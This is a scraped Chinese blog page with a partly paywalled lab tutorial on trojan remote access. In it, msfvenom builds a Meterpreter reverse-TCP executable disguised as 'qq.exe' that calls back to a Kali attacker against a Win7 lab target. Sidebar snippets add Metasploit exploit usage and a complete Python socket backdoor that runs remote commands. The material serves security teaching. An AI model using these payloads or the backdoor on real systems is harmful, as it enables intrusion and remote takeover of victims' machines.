木马远程连接与攻击

最新推荐文章于 2023-09-14 10:06:48 发布
最新推荐文章于 2023-09-14 10:06:48 发布
阅读量664 收藏 1
点赞数
分类专栏: 网络安全试题解析 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shatianyzg/article/details/124830546
版权

木马远程连接与攻击
环境:
1.kali攻击机 192.168.241.129
2.靶机 win7 192.168.241.128
在这里插入图片描述

3.kali下用msfvenom制作exe可执行文件木马
使用说明
在这里插入图片描述

查看payloads (武器)
在这里插入图片描述

查看靶机操作系统详细信息:
在这里插入图片描述

查看通过生成木马的格式

在这里插入图片描述

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.241.129 LPORT=8088 -f exe -o qq.exe
在这里插入图片描述

木马压缩或捆绑

了解本专栏 订阅专栏 解锁全文 超级会员免费看
shatianyzg
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Metasploit攻击winserver2008实例
qwerzxcvb123的博客
03-31 3356
Metasploit攻击winserver2008实例 一、实验目的 1)了解拒绝服务攻击的原理及其危害 2)了解SMB协议及其漏洞信息 3)使用Metasploit对win2008系统进行拒绝服务攻击 二、实验环境 漏洞主机:win server 2008,IP地址:10.1.1.144 攻击主机:Kali linux,IP地址:10.1.1.128 三、实验内容与实验要求 初步了解实验环境及...
天津理工大学信息安全网络攻击预防与技术实验4
11-28
1.实验目的 1) 掌握木马病毒的概念,加深对其危害的认识; 2)深入理解木马病毒的特征和运行原理; 3)掌握木马病毒技术,了解木马整体反检测和反查杀能力。 2.实验方案 1)网络环境中有两台主机,有一台为实验机(客户机);另一台为本次实验任务的攻击目标(目标机)。本次实验我们在目标机上编写并运行木马程序,在实验机上利用telnet命令控制木马攻击目标机。 Mini木马作为早期的远程控制类木马,非常具有代表性,它的基本工作原理就是基于TCP的Socket技术,这也是现有木马技术的基本知识。这类木马最大的特点是不需要客户端软件,只要有Windows自带的Telnet软件远程连接即可出现命令行窗口,服务端通过监听某个端口提供服务,类似于Telnet服务的后台程序。
木马原理与现状+毕业论文
03-19
第一章 木马概述 - 4 - 1.1“木马”名称的由来 - 4 - 1.2木马病毒发展史 - 4 - 1.2.1第一代木马 :伪装型病毒 - 4 - 1.2.2第二代木马 :AIDS型木马 - 4 - 1.2.3第三代木马:网络传播性木马 - 5 - 1.3研究木马原理的重要性 - 5 - 第二章 木马的原理 - 7 - 2.1木马的分类 - 7 - 2.1.1.远程控制型 - 7 - 2.1.2 密码发送型 - 7 - 2.1.3 键盘记录型 - 7 - 2.1.4 毁坏型 - 7 - 2.1.5 FTP型 - 7 - 2.1.6 DoS攻击型 - 7 - 2.1.7 代理型 - 8 - 2.1.8 反弹端口型 - 8 - 2.2 木马的特点 - 8 - 2.2.1隐秘性 - 8 - 2.2.2 自动运行性 - 8 - 2.2.3 危害性 - 8 - 2.3木马和病毒的区别 - 9 - 2.4 木马的体系结构[2] - 9 - 2.4.1植入 - 11 - 2.4.2 隐藏和加载 - 13 - 2.4.3 木马和外界联系[9] - 15 - 第三章 木马的现状 - 17 - 3.1 典型的以及常见的木马 - 17 - 3.1.1冰河 - 17 - 3.1.2灰鸽子 - 18 - 3.1.3“落雪”木马 - 20 - 3.2反木马工具 - 22 - 3.2.1 Ewido - 22 - 3.2.2 Trojan Hunter和TDS-3 - 22 - 3.2.3 IceSword - 22 - 3.3木马发展现状及新技术[10] - 23 - 3.3.1反弹型木马 - 23 - 3.3.2利用正常连接 - 23 - 3.3.3利用IP报头 - 23 - 3.4木马发展的趋势及展望[11] - 23 -
木马原理与现状 毕业论文
03-21
摘要 - 3 - 第一章 木马概述 - 4 - 1.1“木马”名称的由来 - 4 - 1.2木马病毒发展史 - 4 - 1.2.1第一代木马 :伪装型病毒 - 4 - 1.2.2第二代木马 :AIDS型木马 - 4 - 1.2.3第三代木马:网络传播性木马 - 5 - 1.3研究木马原理的重要性 - 5 - 第二章 木马的原理 - 7 - 2.1木马的分类 - 7 - 2.1.1.远程控制型 - 7 - 2.1.2 密码发送型 - 7 - 2.1.3 键盘记录型 - 7 - 2.1.4 毁坏型 - 7 - 2.1.5 FTP型 - 7 - 2.1.6 DoS攻击型 - 7 - 2.1.7 代理型 - 8 - 2.1.8 反弹端口型 - 8 - 2.2 木马的特点 - 8 - 2.2.1隐秘性 - 8 - 2.2.2 自动运行性 - 8 - 2.2.3 危害性 - 8 - 2.3木马和病毒的区别 - 9 - 2.4 木马的体系结构[2] - 9 - 2.4.1植入 - 11 - 2.4.2 隐藏和加载 - 13 - 2.4.3 木马和外界联系[9] - 15 - 第三章 木马的现状 - 17 - 3.1 典型的以及常见的木马 - 17 - 3.1.1冰河 - 17 - 3.1.2灰鸽子 - 18 - 3.1.3“落雪”木马 - 20 - 3.2反木马工具 - 22 - 3.2.1 Ewido - 22 - 3.2.2 Trojan Hunter和TDS-3 - 22 - 3.2.3 IceSword - 22 - 3.3木马发展现状及新技术[10] - 23 - 3.3.1反弹型木马 - 23 - 3.3.2利用正常连接 - 23 - 3.3.3利用IP报头 - 23 - 3.4木马发展的趋势及展望[11] - 23 -
网络安全原理与应用:木马简介.pptx
05-16
木马简介 第3章 计算机病毒与木马 目标 Objectives 要求 了解计算机木马的基本概念; 了解计算机木马的基本工作原理 了解常见的计算机木马木马简介 一、古希腊特洛伊木马 古希腊传说,特洛伊王子帕里斯访问希腊,诱惑走了王后海伦,希腊人因此远征特洛伊。围攻9年后,到第10年,希腊将领奥德修斯献了一计,就是把一批勇士埋伏在一匹巨大的木马腹内,放在城外后,佯作退兵。特洛伊人以为敌兵已退,就把木马作为战利品搬入城中。到了夜间,埋伏在木马中的勇士跳出来,打开了城门,希腊将士一拥而入攻下了城池。 木马简介 二、计算机木马病毒 计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码;是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。 计算机木马能与远程计算机之间建立起连接,使远程计算机能够通过网络控制用户计算机系统并且可能造成用户的信息损失、系统损坏甚至瘫痪的程序。 特洛伊木马程序往往表面上看起来无害,但是会执行一些未预料或未经授权,通常是恶意的操作。 系统启动时,木马自动在后台运行 最终,这种程序以“里应外合”的工作方式,达到控制敌方计算机、窃取关键信息
论网络攻击技术与网络安全(全文).docx
06-10
论网络攻击技术与网络安全(全文)全文共6页,当前为第1页。论网络攻击技术与网络安全(全文)全文共6页,当前为第1页。论XX络攻击技术与XX络安全 论网络攻击技术与网络安全(全文)全文共6页,当前为第1页。 论网络攻击技术与网络安全(全文)全文共6页,当前为第1页。 XX: 前言 互联XX技术的高速进展改变了人们的生产与生活,促进了经济与社会进展进步,在取得显著成效的同时,信息技术安全是不容忽视的重要问题。回忆我国当前的互联XX进展,和发达GJ相比还有较大差距,虽然也重视了XX络安全技术的开发与运用,但是受制于人才以及设备、技术等方面的因素,安全防护工作难以达到令人中意的程度。当前,互联XX技术与设备更新换代的速度不断加快,病毒攻击防不胜防,国内互联XX安全工作现状不尽如人意。本文主要针对当前常用的XX络攻击技术以及XX络安全工作进行分析研究。 1、常用的XX络攻击技术 目前,XX络攻击方法层出不穷,而且随着技术的不断进展,XX络攻击日益呈现自动化、低门槛的趋势,黑客、间谍常采纳的XX络攻击技术。 1.1 有机可乘的系统漏洞 系统漏洞是指应用软件或操作系统在逻辑设计上的缺陷或在编写时产生的错误,这些缺陷或错误可以被间谍利用以猎取远程计算机的操纵权,轻易窃取远程计算机中的重要资料。其主要方式是以口令为攻击目标,进行推测破译,或避开口令验证,冒充合法用户潜入目标计算机,取得对计算机的操纵权。尽管通过论网络攻击技术与网络安全(全文)全文共6页,当前为第2页。论网络攻击技术与网络安全(全文)全文共6页,当前为第2页。"打补丁"的方式可以缓解由"漏洞"引起的问题,但是大多数人没有及时"打补丁"的意识,可能造成计算机系统长期存在系统漏洞,这就给XX络间谍以可乘之机。例如,XX络扫描技术就是通过在Internet 上进行广泛搜索,以找出特定计算机或软件中的弱点。 1.2 里应外合的"木马" "木马"是一种隐蔽的远程操纵软件。计算机木马程序一般由两个部分组成:木马和控守中心。为了防止安全人员的追踪,往往再增加一个部分:跳板。它是木马与控守中心通信的桥梁,一般也是被攻击者操纵的机器,木马通过跳板与控守中心联系,拥有控守中心的人就可以通过XX络操纵你的计算机,了解你的一举一动,捕获每一次键击事件,轻松窃取密码、目录路径、驱动器映射,甚至个人通信方面的信息及一切文档内容。如果你的机器上还带有麦克风或摄像头,那么窃听你的所有谈话内容和捕获一切视频流量对它来说也是举手之劳。 由于计算机系统本身存在的漏洞或使用者的安全意识不足,导致"木马"可以通过多种方式进入上XX计算机。比如在扫瞄XX页时,可埋伏在链接和图片中;收邮件时,可藏在附件里;下载程序时,可把自己和程序合并为一体。很多木马还会采纳隐藏技术,如有的木马把名字改为window.exe,不熟悉系统的人根本不敢删除;还有的通过代码注入和dll插入技术,埋伏在系统进程如svchost.exe 或explorer.exe 中,从防火墙的监控日论网络攻击技术与网络安全(全文)全文共6页,当前为第3页。论网络攻击技术与网络安全(全文)全文共6页,当前为第3页。志中很难推断是正常连接还是恶意连接,由此,采纳不同隐藏技术的木马就神不知鬼不觉地穿过了防火墙与控守中心通信了。据有关部门统计,"木马"攻击占全部病毒破坏事件的90%,仅20XX 年上半年,境外就有近8万台主机对我境内计算机进行过木马攻击,我境内有近一百万台计算机被植入"木马"。 1.3 监听XX络数据的嗅探器 XX络嗅探即XX络监听,是一种可以利用计算机XX络共享通讯通道进行数据捕获的技术。嗅探侦听主要有两种途径,一种是将侦听工具软件放到XX络连接的设备或可以操纵XX络连接设备的电脑上,比如XX关服务器、路由器;另外一种是针对不安全的局域XX,放到个人电脑上就可以实现对整个局域XX的侦听。由于在一个一般的XX络环境中,账号和口令等很多信息以明文方式传输,一旦入侵者获得其中一台主机的治理员权限,就可以窃听到流经整个局域XX的数据,并有可能入侵XX络中的所有计算机。XX络监听软件可以监听的内容包罗万象,从账户密码到聊天记录,从电子邮件到XX页内容。不久前,一款MSN 的监听软件在互联XX上盛行,只要下载安装这个软件,任何一个一般人都能在XX上监听本地局域XX内所有人的MSN 聊天内容。 1.4 不知不觉窃走隐私的"摆渡"病毒 "摆渡"病毒以移动存储设备为媒介,在电脑间传播。据传该病毒是美国中情局授意微软特意留下的漏洞,与系统结合,具论网络攻击技术与网络安全(全文)全文共6页,当前为第4页。论网络攻击技术与网络安全(全文)全文共6页,当前为第4页。有消息堵塞功能,目前没有任何杀毒软件能侦测该病毒。以U盘为例,通过互联XX或其它途径,使U盘感染"摆渡"病毒,当U盘
Metasploit 如何使用Exploits(漏洞)
ddr12231的博客
05-07 1622
在Metasploit中选择一个漏洞利用程序将'exploit'和'check'命令添加到msfconsole。 msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index msf exploit(ms09_050_smb2_negotiate_func_index) > help ...略... ...
木马病毒 勒索病毒解决办法链接
lulubaby_的博客
08-09 1万+
https://malwarefixes.com/
渗透测试三合一-仅供参考
网络安全领域优质创作者
11-05 1215
10.11.1.141 搜索webmin,确定使用2017.pl perl2017.pl 10.11.1.141 10000 /root/proof.txt loading1 (alice) BUGZBUNNY (bob) 10.11.1.145 完成 nmap-p 445 --script vuln 10.11.1.145 CVE-2009-3103msf搜索用:exploit/windows/smb/ms09_050_sm...
手机+win木马远程复现
最新发布
2301_77538736的博客
09-14 32
还有好多功能没有演示,再次说明网络上的各种软件链接谨慎下载。
常见的三种木马连接原理
ygyangguang的专栏
01-08 2420
目前常见的木马有三种:正向连接木马、反弹连接木马、收信木马。了解也木马连接原理,有助于我们更好防御。 目前常见的木马有三种:正向连接木马、反弹连接木马、收信木马。正向连接木马,所谓正向,就是在中马者在机器上开个端口,而我们去连接他的端口。而我们要知道他的IP,才能够连接他。123就是他机器上开的端口。由于到现在,宽带上网(动态IP)和路由器的普遍,这个软件就有很大的不足。动态I
windows提权常用系统漏洞与对应的补丁编号
sweelg的博客
05-29 4098
CVE-2021-1732[Windows Win32k 提权漏洞] (Windows 10, 2019/20H2) CVE-2020-0787【Windows后台智能传输服务提权漏洞】(Windows 7/8/10、2008/2012/2016/2019) CVE-2020-0796[Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在一个远程代码执行漏洞,即“Windows SMBv3 客户端/服务器远程代码执行漏洞”] (Windows 1903/1909..
MSFCONSOLE COMMANDS
子曰小玖的博客
04-22 976
MSFCONSOLE CORE COMMANDS TUTORIAL The MSFconsole has many different command options to choose from. The following are a core set of Metasploit commands with reference to their output. back ...
metasploit MS09_050
WTleaf的博客
11-30 3654
攻击机:kali2.0 靶机:Windows 2008 使用软件:metasploit
MS11-050 Metasploit 利用
0ffs3t
11-17 1855
首先打开Metasploit选择msf > use exploit/windows/browser/ms11_050_mshtml_cobjectelement 然后配置选项  本机IP是 192.168.92.133 进行攻击 exploit 在被攻击电脑上执行http://192.168.92.133:8888/lenhook.html 返回Met
metasploit-学习8--显示exploit的模块的所有exploit信息
热门推荐
简单就是美
06-19 2万+
Name                                             Disclosure Date  Rank    Description    ----                                             ---------------  ----    -----------    aix/rpc_cmsd_opcod
木马连接通用原理
lyle2000w的专栏
11-03 2709
木马可以算使一种特殊的远程控制软件,需要基于网络才能实现,而远程控制技术,始于DOS时代,只是出于种种原因而没有引起人们的重视。而随着网络的不断改进,该技术越来越受到重视,越来越普及,于是防范木马成了安全中不可少的课题,各种 层出不穷的方法来范。而木马作者为了木马的生存,也不断改进,连接技术就是木马技术中必不可少的。今天就和大家来初步探索下。    1、主动连接  这种连接方式
使用kali进行渗透测试--攻击实例:Windows 2008
lxy123_com的博客
02-04 4940
实验环境:Kali虚拟机一台、4G运行,Windows 2008靶机一台,IP地址192.168.22.138 实验目的:使用kali对Windows 2008进行渗透测试 实验步骤: (一),对靶机进行扫描 1,使用Neuss进行扫描 2,开启metasploit框架进行扫描 msf6 > db_nmap -A -T4 192.168.22.138 使用nmap进行扫描 (二),进行渗透测试 扫描smb版本信息 msf6 > search s
python远程控制木马
09-05
远程控制木马是一种恶意软件,它通过网络连接远程主机,并允许攻击者在目标计算机上执行各种操作和命令。根据提供的引用内容,以下是一个使用Python编写的远程控制木马的示例代码: ```python # 服务端(server)程序 import socket import os def attack(): try: s = socket.socket() s.bind(('0.0.0.0', 6667)) # 使用默认地址,所有设备均可访问该服务器的6667端口 s.listen() # 对6667端口进行监听 channel, client = s.accept() # 进入阻塞状态,accept() 返回元组,接受来自客户端的数据 # channel: 新的socket对象用于标识出服务器和哪个客户端连接进行通信 # client: 客户端的IP和端口 while True: receive = channel.recv(1024).decode() # 接收来自客户端的命令 reply = os.popen(receive).read() # 执行命令,并获取执行结果 channel.send(f"命令{receive}的运行结果:\n{reply}".encode()) # 将结果发送回客户端 except: s.close() if __name__ == '__main__': attack() # 客户端(client)程序 import socket s = socket.socket() s.connect(('192.168.137.1', 6667)) # 192.168.137.1是socket服务器的地址 while True: sendstr = input("请输入消息:") s.send(sendstr.encode()) # 将命令发送给服务器 receive = s.recv(1024).decode() # 接收服务器的回复 print(f"服务器回复:{receive}") ``` 请注意,远程控制木马是一种非法行为,严重侵犯他人隐私和安全。在进行任何网络活动时,请始终遵守法律和道德规范。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [基于Python实现socket远程木马](https://blog.csdn.net/weixin_49472648/article/details/125308268)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shatianyzg

创作不易,不断探索

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值